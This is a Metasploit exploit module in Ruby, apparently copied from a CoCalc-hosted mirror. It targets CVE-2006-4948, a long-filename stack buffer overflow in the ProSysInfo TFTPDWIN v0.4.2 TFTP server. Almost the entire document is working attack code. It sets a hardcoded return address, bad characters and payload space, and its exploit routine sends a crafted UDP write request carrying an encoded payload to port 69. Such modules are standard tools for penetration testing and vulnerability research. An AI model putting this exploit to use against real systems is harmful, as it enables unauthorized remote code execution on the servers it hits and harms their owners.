CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'TFTPDWIN v0.4.2 Long Filename Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending
16
        an overly long file name to the tftpd.exe server, the stack can be overwritten.
17
      },
18
      'Author' 	 => [ 'aushack' ],
19
      'References'     =>
20
        [
21
          [ 'CVE', '2006-4948' ],
22
          [ 'OSVDB', '29032' ],
23
          [ 'BID', '20131' ],
24
          [ 'EDB', '3132' ],
25
        ],
26
      'DefaultOptions' =>
27
        {
28
          'EXITFUNC' => 'process',
29
        },
30
      'Payload'        =>
31
        {
32
          'Space'    => 284,
33
          'BadChars' => "\x00",
34
          'StackAdjustment' => -3500,
35
        },
36
      'Platform'       => 'win',
37
      'Targets'        =>
38
        [
39
          # Patrick - Tested OK 2007/10/02 w2ksp0, w2ksp4, xpsp0, xpsp2 en
40
          [ 'Universal - tftpd.exe', { 'Ret' => 0x00458b91 } ] # pop edx / ret tftpd.exe
41
        ],
42
      'Privileged'     => false,
43
      'DisclosureDate' => '2006-09-21',
44
      'DefaultTarget'  => 0))
45

46
    register_options(
47
      [
48
        Opt::RPORT(69),
49
      ], self)
50
  end
51

52
  def exploit
53
    connect_udp
54

55
    print_status("Trying target #{target.name}...")
56
    sploit = "\x00\x02" + payload.encoded + [target['Ret']].pack('V')
57
    sploit << "netascii\x00" # The first null byte is borrowed for the target return address :)
58
    udp_sock.put(sploit)
59

60
    disconnect_udp
61
  end
62
end
63

64